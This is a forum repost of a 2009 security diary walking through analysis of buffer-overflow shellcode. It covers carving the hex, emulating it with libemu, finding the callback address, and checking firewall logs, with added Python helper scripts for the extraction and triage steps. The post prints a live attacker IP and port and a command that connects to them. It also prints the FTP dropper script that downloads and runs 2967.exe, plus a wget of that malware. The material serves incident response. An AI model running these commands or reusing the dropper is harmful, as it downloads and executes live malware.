Microsoft Windows Vista Community Forums - Vistaheads
3322. org, (Sun, Jan 18th)

Forum: Security News
Posted by Steve (Moderator) on 01-19-2009
Earlier today, an ISC reader sent us a looong capture of what looked like a buffer overflow attack. In between a lot of filler chars used to trigger the overflow was the code block below.

The obvious question to ask in view of such an attack is what are they trying to do and was it successful. To help you answer these questions next time you find yourself on the receiving end of something like this, here's a quick walk-through on how we went about coming up with the answers.
1. Prune the capture to remove the part that is filler (i.e. all the kkkkllllll in the capture shown)
2. Convert the remaining capture into a binary file. Here's how I do it:

cat a.txt | cut -b 11-58 | perl -pe 's/(..)\s+/chr(hex($1))/ge' > a.bin
The cut command strips out the address to the left and the printed characters to the right, and only leaves the HEX codes, which then are converted by the perl instruction into single byte characters and written into a file that I called a.bin
3. Next, use the sctest tool of libemu to try and make sense of the code block. Libemu doesn't always work on such code, but IF it works, it is doing such a stellar job that I'm always trying libemu/sctest first before loading the code into Ollydbg or Objdump for manual analysis. In this case, we're lucky: sctest makes quick work of the code, and we see that the connect function of WinSock is used to establish an outbound TCP connection on port 78.

$sctest -Sgs 10000 a.bin
success offset = 0x00000031
Hook me Captain Cook!
userhooks.c:127 user_hook_ExitThread
ExitThread(0)
stepcount 8189
[....]
) =
int connect (
struct sockaddr_in * name = 0x0041714a =
struct = {
struct in_addr sin_addr = {
char sin_zero =
[...]


4. Let's connect to the address and port that libemu so nicely revealed ... and lookie, we get an FTP script that downloads and starts an EXE from 3322.orrrg (org changed to orrrg to keep you from clicking :)

$nc 218.61.22.7 78
echo open a528.3322.orrrg>1.txt
echo 2967>>1.txt
echo 2967>>1.txt
echo binary>>1.txt
echo get 2967.exe>>1.txt
echo bye>>1.txt
ftp -s:1.txt
2967.exe
2967.exe
2967.exe
del 1.txt
exit
^C
5. Next, we fetch the malware manually

$wget ftp://2967:2967@a528.3322.orrrg/2967.exe

[....]
6. Lastly, we analyze 2967.exe with tools like Virustotal (result) and ThreatExpert (result).

Thus, if this had been directed at a server of yours, you would now check the firewall log (IDS, flow log, etc) for an outbound connection attempt to port 78. If nothing is found, the exploit wasn't successful. If you see the connection to port 78 and it went through (for example because you allow all ports outbound) the next step is to check for the FTP. If the FTP completed as well, you know it is time to re-build that server.
And yes, adding the 3322-dot-org domain to your block list would be a good idea. As you can tell from this diary that we published in 2007, it is by far not the first time that this domain shows up on our malware radar ... and the ThreatExpert report included above contains yet another reason to zap this domain and all its subdomains.
Careful: All the baddies are still live at this time, shoot your foot at your own risk.
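Steps 1 and 2 of the walk-through above as a small Python script, added here as an illustration and not the diary's or ISC's own code: it reads a hexdump -C style capture, keeps only the hex column (what the cut/perl pipeline does), and trims the filler runs at either end. The dump, the 'k'/'l' filler bytes and the eight placeholder payload bytes are constructed for the example.

```python
import re

# Constructed sample capture in `hexdump -C` layout (offset, 16 hex bytes, ASCII column);
# the 'k' and 'l' runs stand in for the filler the diary mentions, the 8 bytes in the
# middle are a placeholder payload, not real shellcode.
SAMPLE_DUMP = """\
00000000  6b 6b 6b 6b 6b 6b 6b 6b  6b 6b 6b 6b 6b 6b 6b 6b  |kkkkkkkkkkkkkkkk|
00000010  6c 6c 6c 6c 6c 6c 6c 6c  de ad be ef ca fe f0 0d  |llllllll........|
00000020  6b 6b 6b 6b 6b 6b 6b 6b                           |kkkkkkkk|
"""

# One dump line: an offset, then hex byte pairs each followed by whitespace or end of line.
# The ASCII column begins with '|', so the hex group stops before it.
HEX_LINE = re.compile(r"^\s*[0-9a-fA-F]{4,8}\s+((?:[0-9a-fA-F]{2}(?:\s+|$))+)")


def hexdump_to_bytes(dump: str) -> bytes:
    """Equivalent of the diary's cut/perl pipeline: keep only the hex column, decode it."""
    out = bytearray()
    for line in dump.splitlines():
        m = HEX_LINE.match(line)
        if m:
            out += bytes.fromhex(m.group(1))  # fromhex ignores the whitespace between pairs
    return bytes(out)


def strip_filler(data: bytes, filler: bytes = b"kl", min_run: int = 8) -> bytes:
    """Step 1 of the diary: drop runs of filler bytes at either end of the capture.
    Only runs of at least min_run bytes are removed, so a short 'k' or 'l' byte that
    is part of the code itself is left alone."""
    cls = re.escape(filler)
    pat = re.compile(b"^[%s]{%d,}|[%s]{%d,}$" % (cls, min_run, cls, min_run))
    return pat.sub(b"", data)


def extract_payload(dump: str, filler: bytes = b"kl") -> bytes:
    """Capture text in, pruned binary out (what the diary writes to a.bin)."""
    return strip_filler(hexdump_to_bytes(dump), filler)


if __name__ == "__main__":
    payload = extract_payload(SAMPLE_DUMP)
    with open("a.bin", "wb") as fh:  # same file name the diary then feeds to sctest
        fh.write(payload)
    print(f"wrote {len(payload)} bytes to a.bin")
```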
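The triage described in the closing paragraph (look for the outbound port 78 callback, then for the FTP that follows it, then decide whether to rebuild) as a Python check over egress-firewall log lines. This is an added example and not from the diary; the log format, the internal host addresses and the 203.0.113.9 FTP server address are constructed for it, while 218.61.22.7 and port 78 are the values the post gives.

```python
from collections import defaultdict

CALLBACK_PORT = 78      # the outbound port libemu showed the shellcode connecting to
FTP_PORT = 21           # the second stage in the diary is an FTP download

# Constructed egress-firewall log lines (not from the diary):
# timestamp  src  dst  dport  action.  218.61.22.7 is the callback host from the post;
# 203.0.113.9 is a placeholder for the FTP server, the real one resolves elsewhere.
SAMPLE_LOG = """\
2009-01-18T10:01:02 10.0.0.5 218.61.22.7 78 ALLOW
2009-01-18T10:01:03 10.0.0.5 203.0.113.9 21 ALLOW
2009-01-18T10:02:00 10.0.0.6 218.61.22.7 78 DENY
2009-01-18T09:55:00 10.0.0.7 203.0.113.9 21 ALLOW
2009-01-18T10:03:00 10.0.0.7 218.61.22.7 78 ALLOW
2009-01-18T10:04:00 10.0.0.8 198.51.100.20 443 ALLOW
"""


def parse_log(text):
    """Parse whitespace-separated lines into dicts; blank or malformed lines are skipped."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, src, dst, dport, action = parts
        flows.append({"ts": ts, "src": src, "dst": dst, "dport": int(dport), "action": action})
    return flows


def triage(flows):
    """Apply the diary's decision tree per internal host:
    clean = no port-78 attempt; blocked = attempt denied at egress;
    callback = 78 allowed but no FTP after it; rebuild = 78 allowed and FTP followed."""
    by_src = defaultdict(list)
    for f in flows:
        by_src[f["src"]].append(f)
    verdicts = {}
    for src, fl in by_src.items():
        cb = [f for f in fl if f["dport"] == CALLBACK_PORT]
        if not cb:
            verdicts[src] = "clean"
            continue
        allowed = [f for f in cb if f["action"] == "ALLOW"]
        if not allowed:
            verdicts[src] = "blocked"
            continue
        first_cb = min(f["ts"] for f in allowed)  # ISO timestamps sort lexically
        ftp_after = any(f["dport"] == FTP_PORT and f["action"] == "ALLOW" and f["ts"] > first_cb
                        for f in fl)
        verdicts[src] = "rebuild" if ftp_after else "callback"
    return verdicts
```

An FTP session that predates the callback (10.0.0.7 in the sample) is deliberately not counted, since it cannot be the download the shellcode triggered.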

